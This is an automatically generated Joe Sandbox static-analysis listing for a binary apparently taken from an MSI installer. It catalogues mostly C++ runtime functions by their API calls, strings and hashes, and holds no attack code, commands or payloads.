mscoree.dll, xrefs: 00722E1C
2q, xrefs: 00722E46
CorExitProcess, xrefs: 00722E2D

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: 2q$CorExitProcess$mscoree.dll
API String ID: 4061214504-2850651583
Opcode ID: 3d2f8cb80ace609dcf3c11d7d28f34c38a2c22c1bd2c022f82978928ace54ca8
Instruction ID: c1dc8600996b18b6193e70c0c68bf9df9157cb5052a78f452e771052bdbafd47
Opcode Fuzzy Hash: 3d2f8cb80ace609dcf3c11d7d28f34c38a2c22c1bd2c022f82978928ace54ca8
Instruction Fuzzy Hash: 960167B291862DBBEB169F50DC09FAFB7B8FB44B11F058525F811A22A0D77CD901CA54

Uniqueness

Uniqueness Score: -1.00%

Function 00712C4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0074DD3C,?,?,006F2427,0074E638,00736B40), ref: 00712C58
LeaveCriticalSection.KERNEL32(0074DD3C,?,?,006F2427,0074E638,00736B40), ref: 00712C8B
RtlWakeAllConditionVariable.NTDLL ref: 00712D02
SetEvent.KERNEL32(?,006F2427,0074E638,00736B40), ref: 00712D0C
ResetEvent.KERNEL32(?,006F2427,0074E638,00736B40), ref: 00712D18

Strings

2q, xrefs: 00712CFC

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID: 2q
API String ID: 3916383385-950290719
Opcode ID: be6761dc5dfe2b0b32b63686a8deabe41ad8297a7538d29b233047f09c3c7a71
Instruction ID: 1dd1cc2e4fdad6902c3eec19baf2a16ea5f6fdff09f90933d1c31bbc4d887204
Opcode Fuzzy Hash: be6761dc5dfe2b0b32b63686a8deabe41ad8297a7538d29b233047f09c3c7a71
Instruction Fuzzy Hash: 270146B9A05124DFD769AF18FC08A997B65FB4A342701846BF94283330CB795C41DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 006FB500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006FB531
std::_Lockit::_Lockit.LIBCPMT ref: 006FB54F
std::_Lockit::~_Lockit.LIBCPMT ref: 006FB577
LocalAlloc.KERNEL32(00000040,0000000C,00000000,DBD9785B,?,00000000,00000000), ref: 006FB5CF
std::_Facet_Register.LIBCPMT ref: 006FB6B7
std::_Lockit::~_Lockit.LIBCPMT ref: 006FB6E1

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
String ID:
API String ID: 3931714976-0
Opcode ID: 48a7991ff6ad2745123d9a50bae7276b236f18a45f045f608be33e5cda7648b3
Instruction ID: b297be590de7a095f25a0ff7ce375d0622d1c81c16db5e4d1b39e5b66675aa82
Opcode Fuzzy Hash: 48a7991ff6ad2745123d9a50bae7276b236f18a45f045f608be33e5cda7648b3
Instruction Fuzzy Hash: 9451D1B4900248DFDB11CF68C8847EEBBF5FF10314F24815AE915AB391D7B9AA05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 006FB700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006FB731
std::_Lockit::_Lockit.LIBCPMT ref: 006FB74F
std::_Lockit::~_Lockit.LIBCPMT ref: 006FB777
LocalAlloc.KERNEL32(00000040,00000008,00000000,DBD9785B,?,00000000,00000000), ref: 006FB7CF
std::_Facet_Register.LIBCPMT ref: 006FB863
std::_Lockit::~_Lockit.LIBCPMT ref: 006FB88D

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
String ID:
API String ID: 3931714976-0
Opcode ID: 0eabe2a516d8431fe5fea6017a86a34c014608301cf635369b9becfd53275a02
Instruction ID: 4013131d6cce2eaeac1aab82a1f547c359ba02eac8bd101bebf839adae7d8270
Opcode Fuzzy Hash: 0eabe2a516d8431fe5fea6017a86a34c014608301cf635369b9becfd53275a02
Instruction Fuzzy Hash: 5951BFB4904258DFDB21DF58C8447AEBBF5FB54320F24829EE951AB381D778AE01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00720351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0072043B
__freea.LIBCMT ref: 007204D1
__freea.LIBCMT ref: 007204ED

Strings

a/p, xrefs: 007205B5
am/pm, xrefs: 00720551

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm
API String ID: 3509577899-3206640213
Opcode ID: d56e22e03b975c6e79bb0e8a284170724d155ce116ab6c4b1898c39e653f3b8d
Instruction ID: 311d132e9206f5c1cbe18fdbb19fc926fb4468f8e00e9e70966f02da0cbed5a5
Opcode Fuzzy Hash: d56e22e03b975c6e79bb0e8a284170724d155ce116ab6c4b1898c39e653f3b8d
Instruction Fuzzy Hash: 42C1DE34900266DBCF249F68E989ABAB7B0FF46300F248049E505AB752D23DAD41CFF1

Uniqueness

Uniqueness Score: -1.00%

Function 006F5890 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,?,75474450,006F5646,?,?,?,?,?), ref: 006F5898

Strings

Last error=, xrefs: 006F58D9
<St, xrefs: 006F5919
true, xrefs: 006F58A7, 006F58B6
Call to ShellExecuteEx() returned:, xrefs: 006F58AF
false, xrefs: 006F58A2

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ErrorLast
String ID: <St$Call to ShellExecuteEx() returned:$Last error=$false$true
API String ID: 1452528299-1809532151
Opcode ID: c31ec51b75f0734a109fb5f1dd7e7859956def4121b329ac77f72e5e02d67132
Instruction ID: 6b73da68116db0936d5d53ff9f068a4a351133ad9b7dc8c815519212ab1d7289
Opcode Fuzzy Hash: c31ec51b75f0734a109fb5f1dd7e7859956def4121b329ac77f72e5e02d67132
Instruction Fuzzy Hash: F111E156A1062AC7CB342F6C8800376A3E6EF50754F65047FEA8AC7392E7F98C818394

Uniqueness

Uniqueness Score: -1.00%

Function 00715978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0071596F,00714900,0071358F), ref: 00715986
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00715994
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007159AD
SetLastError.KERNEL32(00000000,0071596F,00714900,0071358F), ref: 007159FF

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 53c9a1d166b58445d50da8250b2e9a1943db96ee19c0a4ef7c1fcec158f741c9
Instruction ID: e57706527d6ed049f6a22ba098ce32b48e8f6861608276404a78b0c99862b482
Opcode Fuzzy Hash: 53c9a1d166b58445d50da8250b2e9a1943db96ee19c0a4ef7c1fcec158f741c9
Instruction Fuzzy Hash: 2B01D87720EB21DFA7792A7C7C8AADA2B54DB42775730432BF514841F0EF1D5C819185

Uniqueness

Uniqueness Score: -1.00%

Function 007035F7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 282COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 007035FE
_strcspn.LIBCMT ref: 00703666
_strcspn.LIBCMT ref: 00703686
ctype.LIBCPMT ref: 007036E4

Strings

2q, xrefs: 0070371E

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID: 2q
API String ID: 838279627-950290719
Opcode ID: c9372335315ed652e1ea45f71168fd1d38da60b2d7244f664aecb6cc77db7747
Instruction ID: 4304b0874ce20651c21f50a50e063750b5bfacd29fb6d0ea92848da3a449c5fd
Opcode Fuzzy Hash: c9372335315ed652e1ea45f71168fd1d38da60b2d7244f664aecb6cc77db7747
Instruction Fuzzy Hash: 29B16EB5900249EFDF15DF98C884AEEBBF9FF48310F144219E905AB291D7389E55CB60

Uniqueness

Uniqueness Score: -1.00%

Function 006FDA6F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 006FDA76
_strcspn.LIBCMT ref: 006FDADE
_strcspn.LIBCMT ref: 006FDAFE
ctype.LIBCPMT ref: 006FDB5C

Strings

2q, xrefs: 006FDB96

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID: 2q
API String ID: 838279627-950290719
Opcode ID: 33baba71f434174bbd494b1565003bae7496bcbdb5b337a15bbeed0fe26b09bb
Instruction ID: 8842f2479ba7caf5c6c62f3133cd1746ba7dbcb78ded1eaf53ad7f8f618e34c1
Opcode Fuzzy Hash: 33baba71f434174bbd494b1565003bae7496bcbdb5b337a15bbeed0fe26b09bb
Instruction Fuzzy Hash: 24B1477190024DDFDF10DF98C981AEEBBBAFF08310F144059EA15AB256D774AE46CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 006F3230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,URL,00000000,?,DBD9785B,?,00000004), ref: 006F3294
MoveFileW.KERNEL32(?,00000000), ref: 006F354A
DeleteFileW.KERNEL32(?), ref: 006F3592

Part of subcall function 006F1A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 006F1AF7
Part of subcall function 006F1A70: LocalFree.KERNEL32(7FFFFFFE), ref: 006F1B7D

Part of subcall function 006F2E60: LocalFree.KERNEL32(?,DBD9785B,?,?,00733C40,000000FF,?,006F1242,DBD9785B,?,?,00733C75,000000FF), ref: 006F2EB1

Strings

url, xrefs: 006F33B9, 006F3575
URL, xrefs: 006F328E, 006F357A

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: FileLocal$Free$AllocDeleteMoveNameTemp
String ID: URL$url
API String ID: 853893950-346267919
Opcode ID: 48497ba7127be90ebcab0f08095aa2de6dbd5193713389f028caddc771ca93b4
Instruction ID: 4f9d11a74d92b3fe9a6466fb909b327b5963d4207f089e87d976870bf20c28c2
Opcode Fuzzy Hash: 48497ba7127be90ebcab0f08095aa2de6dbd5193713389f028caddc771ca93b4
Instruction Fuzzy Hash: 44C16770D1426C9ADB24DF28CC987EDBBB5BF14304F1042D9D109A7291EBB96B88CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00715A58 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00715B1F
___AdjustPointer.LIBCMT ref: 00715B42
___AdjustPointer.LIBCMT ref: 00715BDE

Strings

2q, xrefs: 00715AB7

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: AdjustPointer
String ID: 2q
API String ID: 1740715915-950290719
Opcode ID: d14bd429987d713be58a4657d36bdbb5d8c10ebc87591b9a8067c96aca1f7538
Instruction ID: 7939524221a65fdd2ecbe84fda6bf52b30c6cc52f774405b63184cfaa7d71e64
Opcode Fuzzy Hash: d14bd429987d713be58a4657d36bdbb5d8c10ebc87591b9a8067c96aca1f7538
Instruction Fuzzy Hash: 9551AFF2604A06DFDB3D8F18D885BEA77A4EF84310F144629E905962D1E739ADC0C794

Uniqueness

Uniqueness Score: -1.00%

Function 006F36D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 006F3735
GetLastError.KERNEL32(?,?,?,00734215,000000FF), ref: 006F381A

Part of subcall function 006F2310: GetProcessHeap.KERNEL32 ref: 006F2365

Part of subcall function 006F46F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,006F3778,-00000010,?,?,?,00734215,000000FF), ref: 006F4736

_wcschr.LIBVCRUNTIME ref: 006F37C6
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00734215,000000FF), ref: 006F37DB

Strings

ntdll.dll, xrefs: 006F37B3

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
String ID: ntdll.dll
API String ID: 3941625479-2227199552
Opcode ID: ba8dfc275ba81b44c785d3dac34d76b297849aa000cff23d0ddece351ebaf3de
Instruction ID: b48797caedd8292959d257e0d8a57405587ec536ec027fa8f2ebe35e0d85a8b5
Opcode Fuzzy Hash: ba8dfc275ba81b44c785d3dac34d76b297849aa000cff23d0ddece351ebaf3de
Instruction Fuzzy Hash: D141A2B1A006099FDB14DF68CC45BFEB7A5FF04310F14852DEA2697381EBB4AA04CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0070D3CB Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0070D3D2

Part of subcall function 0070254E: __EH_prolog3.LIBCMT ref: 00702555
Part of subcall function 0070254E: std::_Lockit::_Lockit.LIBCPMT ref: 0070255F
Part of subcall function 0070254E: std::_Lockit::~_Lockit.LIBCPMT ref: 007025D0

_Find_elem.LIBCPMT ref: 0070D46E

Strings

2q, xrefs: 0070D425
%.0Lf, xrefs: 0070D419
0123456789-, xrefs: 0070D41E

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 2q$%.0Lf$0123456789-
API String ID: 2544715827-948280965
Opcode ID: 63d49d6c10ce16fec71241cb26901e98bf7e99f0f2b091e7d00636c8cec93c67
Instruction ID: 22e5605206a1bdaac89d769919743f950d4f0026d5ffff8ae61fb00ef4fc2de6
Opcode Fuzzy Hash: 63d49d6c10ce16fec71241cb26901e98bf7e99f0f2b091e7d00636c8cec93c67
Instruction Fuzzy Hash: 7F415B71900258DFCF15DFE8C885ADDBBB5BF08314F100259F901AB296DB78AE56CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0070D66F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0070D676

Part of subcall function 006F8610: std::_Lockit::_Lockit.LIBCPMT ref: 006F8657
Part of subcall function 006F8610: std::_Lockit::_Lockit.LIBCPMT ref: 006F8679
Part of subcall function 006F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 006F86A1
Part of subcall function 006F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 006F880E

_Find_elem.LIBCPMT ref: 0070D712

Strings

2q, xrefs: 0070D6C9
0123456789-, xrefs: 0070D6C2
0123456789-, xrefs: 0070D6BD

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 2q$0123456789-$0123456789-
API String ID: 3042121994-2993176212
Opcode ID: 1fc3f3862603edfcc2ef81f9ed42fe8b6776975a203972c7c793fa362464b01a
Instruction ID: 5ce41313b1325b93616f8075386fd3d53feee61ecf0cf8377705031b77e9ae56
Opcode Fuzzy Hash: 1fc3f3862603edfcc2ef81f9ed42fe8b6776975a203972c7c793fa362464b01a
Instruction Fuzzy Hash: B6417B71900218DFCF15EFE8C880AEE7BB5FF08310F100159E911AB296DB359E56CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0071175A Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00711761

Part of subcall function 006F9270: std::_Lockit::_Lockit.LIBCPMT ref: 006F92A0
Part of subcall function 006F9270: std::_Lockit::_Lockit.LIBCPMT ref: 006F92C2
Part of subcall function 006F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 006F92EA
Part of subcall function 006F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 006F9422

_Find_elem.LIBCPMT ref: 007117FB

Strings

2q, xrefs: 007117B4
0123456789-, xrefs: 007117AD
0123456789-, xrefs: 007117A8

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 2q$0123456789-$0123456789-
API String ID: 3042121994-2993176212
Opcode ID: d61854396ff0f8752e7e6e1d0a0e9db541dea11fd178400e98c985297e7a7e57
Instruction ID: 8c3471b1a2016e7e27e74a1513c54dcb8f92abd4645bc285fa42202d0a167d61
Opcode Fuzzy Hash: d61854396ff0f8752e7e6e1d0a0e9db541dea11fd178400e98c985297e7a7e57
Instruction Fuzzy Hash: 29416D3190120DDFCF05EFA8D881AEEBBB5BF04310F50405AF911AB292DB38DA56CB95

Uniqueness

Uniqueness Score: -1.00%

Function 006F621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 006F1A20: LocalFree.KERNEL32(?), ref: 006F1A42

Part of subcall function 00713E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,006F1434,?,?,006FD341,006F1434,00748B5C,?,006F1434,?,00000000), ref: 00713EBA

GetCurrentProcess.KERNEL32(DBD9785B,DBD9785B,?,?,00000000,00734981,000000FF), ref: 006F62EB

Part of subcall function 00712C98: EnterCriticalSection.KERNEL32(0074DD3C,?,?,?,006F23B6,0074E638,DBD9785B,?,?,00733D6D,000000FF), ref: 00712CA3
Part of subcall function 00712C98: LeaveCriticalSection.KERNEL32(0074DD3C,?,?,?,006F23B6,0074E638,DBD9785B,?,?,00733D6D,000000FF), ref: 00712CE0

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 006F62B0
GetProcAddress.KERNEL32(00000000), ref: 006F62B7

Part of subcall function 00712C4E: EnterCriticalSection.KERNEL32(0074DD3C,?,?,006F2427,0074E638,00736B40), ref: 00712C58
Part of subcall function 00712C4E: LeaveCriticalSection.KERNEL32(0074DD3C,?,?,006F2427,0074E638,00736B40), ref: 00712C8B
Part of subcall function 00712C4E: RtlWakeAllConditionVariable.NTDLL ref: 00712D02

Strings

IsWow64Process, xrefs: 006F62A6
kernel32, xrefs: 006F62AB

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
String ID: IsWow64Process$kernel32
API String ID: 1333104975-3789238822
Opcode ID: 768a9953bc4856a5b0c9c194e50a9a09c460fe31badc6cf1f704ff9bb7d3ee05
Instruction ID: f65f9b4597aa6387f588386808fecb9afc7e5ce518ef89d703e7f0a5ee458b4a
Opcode Fuzzy Hash: 768a9953bc4856a5b0c9c194e50a9a09c460fe31badc6cf1f704ff9bb7d3ee05
Instruction Fuzzy Hash: 3621C3B2904319EFDB14DF94DD06BAD77A5FB15B20F10421AFA11932D0D7796900CA56

Uniqueness

Uniqueness Score: -1.00%

Function 00708451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00708458
_Getvals.LIBCPMT ref: 007084AA
_Mpunct.LIBCPMT ref: 007084E5
_Mpunct.LIBCPMT ref: 007084FF

Strings

$+xv, xrefs: 0070850A

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

